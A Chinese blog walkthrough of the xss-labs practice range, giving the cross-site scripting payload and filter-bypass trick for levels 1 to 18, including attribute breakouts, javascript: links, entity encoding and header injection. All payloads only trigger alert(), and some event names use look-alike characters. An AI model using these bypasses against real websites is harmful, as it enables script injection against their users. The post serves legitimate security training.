xss-labs

已于 2024-03-13 20:51:58 修改
阅读量413 收藏 12
点赞数 7
文章标签: xss 前端
于 2024-03-07 20:54:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80553405/article/details/136516959
版权

xss详解 xss(跨站攻击)_xss script-CSDN博客

level 1

看到GET传参name,直接输入js代码name=<script>alert("哈哈哈")</script>

level 2

尝试1题方法,没成功

查看页面源码,看到<>被替换成其他符号了,但是只有第一个进行了,第二个没有

可以提前闭合value和input标签,输入

"><script>alert("哈哈哈")</script>

level 3

多了个参数submit,且这里value是单引号闭合

和2题一样试试’><script>alert("哈哈哈")</script>,发现不行,查看源码发现单引号,<>依然被替换

可以运用事件触发xss

如' οnfοcus='alert(2)

onfocus 事件在对象获得焦点时发生。

在点击搜索框即可

level 4

和上一题一样,不过换成了双引号

“ οnfοcus=”alert(2)

level 5

试试上一题的方法,发现on被替换成了o_n

查看源码确实有替换,str_replace,不区分大小写,但是strtolower会转换为小写,所以不能用大小写绕过

换一个方法,这里用href标签创造一个超链接

"> <a href=javascript:alert()>2</a>

点击即可

level 6

过滤如下,但是没有strtolower函数,可以用大小写绕过

"> <a Href=javascript:alert()>2</a>

level 7

大小写绕过过滤了,可以用双写绕过

"> <a hhrefref=javascscriptript:alert()>2</a>

level 8

看到过滤了script等东西,还过滤了大小写和双引号

这题输入的值传到了input标签和href中

没法用“闭合,因为值传到href中了,考虑用已有的href注入,但是因为过滤了一些东西不能直接上传js代码,这里可以利用href会自动进行Unicode编码解码,可以将所上传的代码转为Unicode,再自动解码

上传这段代码即可

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

level 9

比上一题多了条判断,上传的值必须有http://才行

在之前代码后加上http://再过滤掉即可

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;// http://

level 10

keyword参数只传到了输出的一句话中,没什么用,但是看到了隐藏参数,利用t_sort参数,考虑到过滤了<>不能闭合标签,这里用onfocus事件,同时加一个输入框type="text"来触发事件

?t_sort=" οnfοcus=javascript:alert() type="text

level 11

和上一题差不多

试试上一题的方法,发现双引号被替换没法闭合

再看看代码,发现有HTTP_REFERER,它是获取http请求中的Referer字段,也就是链接到当前网页的上一页,转包看看,没看到referer,构造referer:111,放包

发现转到t_ref中了

利用t_ref,因为过滤了<>,所以用onfocus事件,再做一个输入框触发事件

Referer:" οnfοcus="alert(1)" type="text

level 12

和上一题一样,这次是HTTP_USER_AGENT,获取User-Agent

抓包改为User-Agent:" οnfοcus="alert(1)" type="text

level 13

这题是cookie

抓包改为Cookie:user=" οnfοcus="alert(1)" type="text

level 14

网站挂了

代码就是个跳转网站

看网上说原来是利用跳转网站,传一个属性里含有xss代码的图片达到弹窗效果

level 15

ng-include指令就是文件包涵的意思,用来包涵外部的html文件,如果包涵的内容是地址,需要加引号

试试之前的方法

?src=" οnfοcus="alert(1)" type="text 发现被替换,只能换别的方法

利用ng-include输入?src='./level1.php' 包含第一题试试

我们可以包涵第一关并让第一关弹窗,但是这里不能包涵那些直接弹窗的东西如<script>,可以包涵那些标签的东西比如<a>、<input>标签等等,这些标签是能需要我们手动点击弹窗的,这里我们使用href标签

?src='./level1.php?name=<a href="" οnfοcus="alert(1)">a</a>'

level 16

这题传的值会到<center>标签输出,考虑制造一个标签传入alert

考虑到本题过滤了/,所以要找一个不要/的标签

这里用<img>标签

输入?keword=<img%0Asrc="x"%0Aοnerrοr="alert(1)">

就是图片加载错误时触发onerror事件,因为有空格替换,所以将原来需要用到空格的地方换成%0A(换行)即可

level 17

htmlspecialchars()函数是一个常用的字符串处理函数,用于将字符串中的特殊字符(如<>等)转换为HTML实体

<embed> 标签定义了一个容器,用来嵌入外部应用或者互动程序(插件)。

他这里用了flash插件,但是很多浏览器不支持该插件,像我的就不行,找一个支持flash插件的浏览器,或者将代码中的embed标签里的src的地址改为index.png即可

因为加了html实体转换,特殊符号不能用,在embed标签中的位置也不需要闭合

将arg02改值即可

arg02= οnclick=alert(1)

level 18

和上一题一样,就是换了个swf文件

2301_80553405
关注
xss-labs通关大合集
wo41ge的博客
07-26 3万+
xss-labs 文章所用的xss-labs靶场的项目地址:https://github.com/do0dl3/xss-labs 然后开始通关 level1 仔细观察三处箭头,可以发现它是向服务器提交了一个name参数,值为“test”,从页面 回显来看,将neme参数的值显示在了页面上,并且显示了name参数值的字符长度 接下来,查看源码 从这里我们可以看到它将name的参数值,插入到了<h2> </h2>标签之间 那么 就很明显,这一关主要就是考察反射型xss 但是由于不
XSS-labs详解
ytdd66的博客
03-23 2866
进入靶场点击图片,开始我们的XSS之旅!
xss初识(xss-lab
weixin_72202802的博客
06-21 894
XSS被称为跨站脚本攻击(Cross-site scripting),由于和CSS(CascadingStyle Sheets) 重名,所以改为XSSXSS主要基于javascript语言完成恶意的攻击行为,因为javascript可以非常灵活的操作html、css和浏览器XSS就是指通过利用网页开发时留下的漏洞(由于Web应用程序对用户的输入过滤不足),巧妙的将恶意代码注入到网页中,使用户浏览器加载并执行攻击者制造的恶意代码,以达到攻击的效果。
xss-labs通关教程
weixin_64712672的博客
06-18 1000
xss-labs通关教程
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
安装xss-labs ppt手册
10-22
**XSS漏洞详解与XSS-Labs安装指南** XSS(Cross Site Scripting),即跨站脚本攻击,是网络安全领域常见的一种攻击方式。它允许攻击者通过注入恶意脚本到网页中,使得用户在不知情的情况下执行这些脚本,从而获取...
xss-labs通关.pdf
04-20
xss-labs靶场20关全通关攻略
XSS-labs通关
em.....
10-24 4353
XSS-labs通关 1.第一关 payload: http://xss/level1.php?name=<Script>alert(1)</Script> 2.第二关 这里变量出现在两处,我们直接利用第二处,做构造以及闭合 payload: 1"><ScRipt>alert(1)</ScRipt> 3.第三关 ​ ​ 用第二关的payload去试一下,发现内容没变化,但是就是没当成js代码 ​ 查一下网页源代码和php代码 ​ 看
xss-labs搭建及通关攻略
热门推荐
K_ShenH的博客
02-03 1万+
xss-labs搭建 (1)首先当然是需要phpstudy的环境,所以要先下载安装phpstudy。 (2)然后到github的网址中下载源码的压缩包。 下载链接:GitHub - do0dl3/xss-labs: xss 跨站漏洞平台 (3)下载后解压缩到phpstudy目录下的WWW子文件夹中,把压缩包的名字改成xss-labs。 (4)然后在输入url HTTPS://127.0.0.1/xss-labs/就可以访问靶场。 xss-labs通关攻略 level...
XSS-Labs合集
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
08-02 2032
Level 1 Level 2 Level 3 Level 4 Level 5 Level 6 Level 7 Level 8 Level 9 Level 10 Level 11 Level 12 Level 13 Level 16 Level 17 Level 18
搭建学习环境(九)——XSS-labs安装以及解题思路
baynk的博客
11-21 8144
0x00 xss-labs 一个专门练习xss的漏洞平台,似乎现在github中也无法下载了,不晓得在什么时候下的,收集了一份,等这个弄完了就准备去系统学习docker了。 安装其实没啥好说的,用之前的环境扔进去就可以用了,cwth。 xss-labs一共有level 20,尽力去做着看看,GOGOGO。 0x01 Level 1 without filter 看了好半天才看出来是啥意思。。...
XSS注入之xss-labs
m0_60716947的博客
05-02 3480
(一)配置环境 (1)phpstudy 的安装 这里可以去看看我写的另外一个文章 SQL注入之sqli-labs_清丶酒孤欢ゞ的博客-CSDN博客 这里面详细的讲了phpstudy的安装与搭建。 (2)xss-labs 的安装 mirrors / do0dl3 / xss-labs · GitCode 点击克隆里面的下载源码,随便选一个形式,然后将文件解压到 phpstudy 下的www 目录下 打开 phpstudy 中的 apache ,在浏览器中输入 127.0.0.1/xss-lab
反射型XSS--理论
m0_56019217的博客
11-07 877
攻击者事先在Web页面中植入恶意代码,一般是攻击链接。当用户进入页面时,恶意代码不会自动执行,而是需要用户自己去点击链接后,反射型XSS攻击才会进行。理论就是这么多,接下来我们举几个实例,来熟悉反射型XSS攻击的原理与恶意代码的形式。
XSS过滤器Filter实现
开发随笔-猫咪酱
11-08 1018
针对xxs攻击实现XssFilter实战,后端全代码解析。其中包括过滤器实现代码和配置类以及ApplicationContextUtils、multipartResolver配置
【SpringBoot】使用注解进行XSS防御
morris
11-06 393
在Spring Boot中,我们可以使用注解的方式来进行XSS防御。注解是一种轻量级的防御手段,它可以在方法或字段级别对输入进行校验,从而防止XSS攻击。
xss的过滤和绕过(2)
最新发布
2402_87039650的博客
11-09 1114
常见的过滤方式是用户输入的标签进行限制,如果采用黑名单的方式,我们可以寻找黑名单中遗漏的标签,在https://portswigger.net/web-security/cross-site-scripting/cheat-sheet这个表中列举了大量的可以用于执行JavaScript的标签和属性,并给出了适用于哪些浏览器。如果没有过滤"<"和">",可以直接引入新的标签,如果尖括号被过滤,可以插入新的事件属性,比如onload,onmousemove等。CSP被设计成完全向后兼容。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值